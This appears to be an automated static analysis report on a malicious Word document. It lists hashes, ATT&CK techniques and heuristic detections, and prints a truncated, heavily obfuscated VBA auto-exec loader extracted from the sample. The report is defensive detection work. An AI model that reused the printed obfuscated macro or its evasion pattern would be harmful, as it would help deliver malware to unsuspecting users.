Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 3dc173a0a8ae7aee…

MALICIOUS

Office (OOXML)

Size: 67.5 KB
Created: 2019-08-29 14:58:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2020-04-06
MD5: e298f3ef2a1d37e479d900ebba22f295
SHA-1: d599c4424723c93f7cf541656eca9b9485e490cc
SHA-256: 3dc173a0a8ae7aee01688f59ba34dc15f28a7bddb71fe0c0abe5deb2821a9f4e
Risk Score: 270

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The sample is an OOXML document containing a malicious VBA macro. The macro is obfuscated and uses `CreateObject` and `Shell()` calls, indicating an intent to execute arbitrary code. The presence of an `AutoOpen` macro further suggests an automated execution path upon opening the document. The script's primary function appears to be downloading and executing a second-stage payload.

Heuristics (8)

  • VBA project inside OOXML (severity: medium; 6 related findings) OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA (severity: critical) OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader (severity: critical) OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro (severity: high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call (severity: high) OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens (severity: high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) (severity: low) OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL (severity: info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All URLs listed below are standard OOXML and Office XML namespace identifiers declared in the document parts; they are expected in any Word document and are not network indicators.
    URLs found in document text (OOXML body / shared strings):
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/drawing/2010/main
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Artifact 1
Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 17325 bytes
SHA-256: 7c78f1ccc5e6b6fec78d568875eea13581824fe1021f12d3c9d41c3e7795234a
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm8"
Attribute VB_Base = "0{7B51DE7A-ABE7-428A-9155-D7C5B65317C7}{C40E55C8-8D09-4CE8-ACB8-4BC9B4EFF54F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "NewMacros1"

Function afBqVf2_Wk9()
hfjkgnzk = Not (-14341 < 9513)


IHZVzAtp = Not (29425 < 14397)

lGerggU = -17528 Mod -4044


afBqVf2_Wk9 = RTrim("eR+%K{/2")
HhyYq9Qxy = Not (-1074 = 9196)

kwAA = Not (12139 = -19143)
kpUVUjd74D = Not (22684 < -16309)


W0rtQImw = Not (2676 < -23584)

F0Ttd = Not (-28836 = -10572)
End Function


Sub Y43w(lrpwniuAa As Long)
Dim ePnRknu As Long
Dim FWf As Long
FWf = GetTickCount + (lrpwniuAa * 1000)
Do
    ePnRknu = GetTickCount
    'Marietta enations
MYPs = 20471 Mod -16361
Dim EbpE6gs5W8 As Variant
EbpE6gs5W8 = "F9=kryJ#`v'ZUkWMEYjTi*rNw@ali2Bl'N93D#R=cl9~BO)4@(;)RBAi5NBh?`lsRZ/<dQG7*|.^yPFdO:@m[FHwgG3cx`39Zyf}x=c}Wl%xwh+uC"


uEEQgVKz = -9747 Mod 16915



    Loop Until ePnRknu >= FWf
End Sub

Function Xvl(EuKC8 As String, uzHkLZ As String, DTi)
BMPDvL = Not (-18758 = -20608)

Dim ZRFn As Integer
ZRFn = 14872
For ORXDWP = 2 To 26

ZRFn = ZRFn + ORXDWP

Next ORXDWP
    
    

LHaOrT0lg8 = -18438 Mod -29578
baAx = 22678 Mod 21557



Dim lKEUh5 As String
Okl = Not (-16329 = -2400)

m1RXTRpc_Zh = 13496 Mod -27262
DsU4xL = -18286 Mod 4312


VDQVqQ4 = 3931 Mod -7621
e7k0 = -21444 Mod -20697



Dim xWUs7WB As String
Dim uMrH As Variant
uMrH = 21992


Dim kgLuE5 As Integer
kgLuE5 = -28616

TSiynV = -4388 Mod -20792
oZNNinwgx2 = -3704 Mod -25357
q9a4h = 27390252.72

bCnvoB0 = 23819 Mod -26259

eeolx = 5220 Mod 7259


fYK_H1 = 3077 Mod 19459


cmMOO = Not (3574 = -7840)

Dim T8gAzNGm As String
aurD = -4592 Mod -7570

SUTKC = 1742 Mod 11568


XEcO3 = Not (-15011 < -18436)

EzUqHWIwaY = 23289 Mod 1029


KNGMaulr = -138382889

LLJw = -21922 Mod 23129



Dim UnjnFLYx As Integer
UnjnFLYx = 18512
For zE0TvbOC = 1 To 97

UnjnFLYx = UnjnFLYx + zE0TvbOC

Next zE0TvbOC
    
    z9z2iJkTuj = 29807 Mod 13932

MsNlExt = -348587.9633



DEfM = YzJ("`ShUg;xm", "-10039")
lKEUh5 = Environ(uzHkLZ)
If Second("12:34:49") = "49" Then
lKEUh5 = Replace(lKEUh5, "\", "\\")
End If
Dim UGKl6YS9 As String
UGKl6YS9 = "Qb?DSmzbF#9_>TZ"


Dim V_iBTw3h As Variant
V_iBTw3h = 24914

KEbkw3fUa = "wM(A{c2aLy"


tNZp5H8Nwv = 4


Dim taO As Integer
taO = 219
For DKeop_pZLdV = 2 To 89

taO = taO + DKeop_pZLdV

Next DKeop_pZLdV
    
    
MHaxdvzrz6 = -140330102


QHVdJrP6 = 23763 Mod 2488


mTF3u_hiMMM = 175705671

XxS0w1ouC_G = -152215080



xWUs7WB = Mid(EuKC8, 1, 1395) & lKEUh5
YHzwd2G9R = 20288 Mod -3251

hriDjZi0A = -6989 Mod 16850


In9g = -8338 Mod 23683



T8gAzNGm = KrX(xWUs7WB, lKEUh5, 1279)
eRXlouL = 17453 Mod 8578


n3KY1FMt = 28996 Mod -5101


Dim k7E As Variant
k7E = "6qoG.?u.uu\Cwmh@#VEz4h_KZd2RFTZn;;~_WBzWn}2!`fJ7/OEt3]P^Z0cgIC}4%YY:T}sy>AW'n)=VPv,bScYEE#Iw|vKDLbE)uMm2y'&u!`8zc$H{@h~e}40H-@a>Q+)SMw=g&*&}"


Dim bLcYm8gObKU As Integer
bLcYm8gObKU = -9746
For nKSz = 0 To 73

bLcYm8gObKU = bLcYm8gObKU + nKSz

Next nKSz
    
    


Xvl = Tr8DzwWXVXR(EuKC8, xWUs7WB, T8gAzNGm, lKEUh5, 1)
oyn935 = Not (-3091 < -29773)

RlGy = -17981 Mod -24214

WPBsnB4 = 2917 Mod -11829


Dim hVVVDCm__F As Byte
hVVVDCm__F = 248
Dim Yx4 As Single
Yx4 = -3057181.1332
ZzxYFpfFg = Not (-19556 > 1279)


m_nxAeKcQ2u = -14978 Mod -22976



End Function

Function KrX(JPcE As String, k07h As String, mcGWW2F)

Dim F_TGRPKc8 As Integer
F_TGRPKc8 = 1377
For T236 = 2 To 18

F_TGRPKc8 = F_TGRPKc8
... (truncated)
Artifact 2
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 62976 bytes
SHA-256: 7c6a8f693dc81fb93827f9ab09a826236f84708bc8f0b47cc79ad32577828f0a